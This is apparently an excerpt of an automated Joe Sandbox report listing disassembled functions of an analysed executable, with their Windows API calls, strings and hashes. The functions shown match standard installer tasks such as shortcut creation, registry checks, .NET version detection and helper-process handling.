                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: 7715E550$FreeString
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3367576848-3936712486
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e040367b628a04ae645fd749e40d1cfb51c1ea3973fe98a4ae999b6810968a58
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c99fdec92309fd26656a6f7ea9bd91ecf5cc306c054acb75a5569a06f28a4b2e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e040367b628a04ae645fd749e40d1cfb51c1ea3973fe98a4ae999b6810968a58
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29A13E71A00104AFDB50EFA9C885B9E7BF8EF09706F55406AF804E7252DB38DD48CB69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0041B3BC Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                                                                                                                                                                                                                                                                                                                                  • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                                                                                                                                                                                                                                                                                                                                  • 73EA6180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                                                                                                                                                                                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                                                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                                                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Object$Select$Delete$A480A570A6180Stretch
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1888863034-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00472DB8 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 337COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                                                                                                                                                                                                                                                                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472F70
                                                                                                                                                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00473077
                                                                                                                                                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 0047308D
                                                                                                                                                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 004730B2
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 971782779-3668018701
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0d90696b7f394c24cdb4db4d6ef42549a737ff1f83f29ed15b4b10dbb48a3fc8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1ded2309c22d90a9957aabde76cedeacc99048359e90752decbb9b8a0015ab1b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d90696b7f394c24cdb4db4d6ef42549a737ff1f83f29ed15b4b10dbb48a3fc8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FD12574A00149AFDB01EFA9D581BDDBBF5AF08305F50806AF804B7392D778AE45CB69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00454860 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,?,00000000,?,00000000,00454AF9,?,0045AECE,00000003,00000000,00000000,00454B30), ref: 00454979
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,00000000,?,00000004,00000000,00454A43,?,0045AECE,00000000,00000000,?,00000000,?,00000000), ref: 004549FD
                                                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,00000000,?,00000004,00000000,00454A43,?,0045AECE,00000000,00000000,?,00000000,?,00000000), ref: 00454A2C
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454897
                                                                                                                                                                                                                                                                                                                                                                  • , xrefs: 004548EA
                                                                                                                                                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548D0
                                                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyEx, xrefs: 004548FC
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: QueryValue$FormatMessageOpen
                                                                                                                                                                                                                                                                                                                                                                  • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2812809588-1577016196
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4f643a2b0558928eb78c870f76fd7b9269d180bdad5757f866f38432355ac2b8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 44bd6ba1492406805f437c97fe518088f2f8e7c1bef0b67c8a01139b77ca8c69
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f643a2b0558928eb78c870f76fd7b9269d180bdad5757f866f38432355ac2b8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0911471944248ABDB10DFE5D942BDEB7FCEB48309F50406BF900FB282D6789E458B69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004597BC Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 165registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004596C8: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459863
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 004598CD
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459934
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00459816
                                                                                                                                                                                                                                                                                                                                                                  • v4.0.30319, xrefs: 00459855
                                                                                                                                                                                                                                                                                                                                                                  • v1.1.4322, xrefs: 00459926
                                                                                                                                                                                                                                                                                                                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004598E7
                                                                                                                                                                                                                                                                                                                                                                  • .NET Framework version %s not found, xrefs: 0045996D
                                                                                                                                                                                                                                                                                                                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00459880
                                                                                                                                                                                                                                                                                                                                                                  • .NET Framework not found, xrefs: 00459981
                                                                                                                                                                                                                                                                                                                                                                  • v2.0.50727, xrefs: 004598BF
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Close$Open
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2976201327-446240816
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9d9338ba28c22f28aee9bf8c04d7193bfa20b7680da3dbf2efb4f8b87dd23137
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 729b419896cd5506e065475e0ee5015c208a67e93f4f54458093df2d8724af3d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d9338ba28c22f28aee9bf8c04d7193bfa20b7680da3dbf2efb4f8b87dd23137
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0051A030A04145EBCB04DFA9C8A1BEE77B69B59305F54447FA841DB393D63D9E0E8B18
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00458DA8 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00458DDF
                                                                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458DFB
                                                                                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458E09
                                                                                                                                                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?), ref: 00458E1A
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458E61
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458E7D
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Helper process exited with failure code: 0x%x, xrefs: 00458E47
                                                                                                                                                                                                                                                                                                                                                                  • Helper isn't responding; killing it., xrefs: 00458DEB
                                                                                                                                                                                                                                                                                                                                                                  • Helper process exited., xrefs: 00458E29
                                                                                                                                                                                                                                                                                                                                                                  • Stopping 64-bit helper process. (PID: %u), xrefs: 00458DD1
                                                                                                                                                                                                                                                                                                                                                                  • Helper process exited, but failed to get exit code., xrefs: 00458E53
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3355656108-1243109208
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e1e6f1a428ddc606cbac7e5be58ccbeaead76fc5c320782193580adc03ed748c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b06cb4cb11178ece3cea1db1bc2ca69ea432733d5239d7d0987fb8f0d427a68f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1e6f1a428ddc606cbac7e5be58ccbeaead76fc5c320782193580adc03ed748c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9216D706047009AD720E679C44275BB6E59F08709F04CC2FB999EB293DF78E8488B2A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00454514 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DDF4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20
                                                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546EB,?,00000000,004547AF), ref: 0045463B
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546EB,?,00000000,004547AF), ref: 00454777
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454553
                                                                                                                                                                                                                                                                                                                                                                  • RegCreateKeyEx, xrefs: 004545AF
                                                                                                                                                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454583
                                                                                                                                                                                                                                                                                                                                                                  • , xrefs: 0045459D
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateFormatMessageQueryValue
                                                                                                                                                                                                                                                                                                                                                                  • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2481121983-1280779767
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 519f70821d915b82821537080e3e12c33d17708908ecafe7f5470ba7bd9353bf
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a200d9e45076b9aa1c9026ee470310bfc0f5ccdb1a8093a9a555fb12639cba12
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 519f70821d915b82821537080e3e12c33d17708908ecafe7f5470ba7bd9353bf
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C81DE75A00209AFDB00DFD5C941BDFB7F9EB49309F50442AE901FB282D7789A45CB69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00496620 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004538A8: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004538A8: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 004539A7
                                                                                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0049669D
                                                                                                                                                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,004967F1), ref: 004966BE
                                                                                                                                                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,STATIC,00496800,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 004966E5
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000FC,00495E78), ref: 004966F8
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000,STATIC,00496800), ref: 00496728
                                                                                                                                                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0049679C
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000), ref: 004967A8
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00453D1C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E03
                                                                                                                                                                                                                                                                                                                                                                  • 73EA5CF0.USER32(?,004967CB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000,STATIC), ref: 004967BE
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                                                                                                                                                                                                                                                                                                  • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 170458502-2312673372
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7a5675202604ee279b5d53ebe19463d24adef2e580cd9ada0264daaad7bee20b
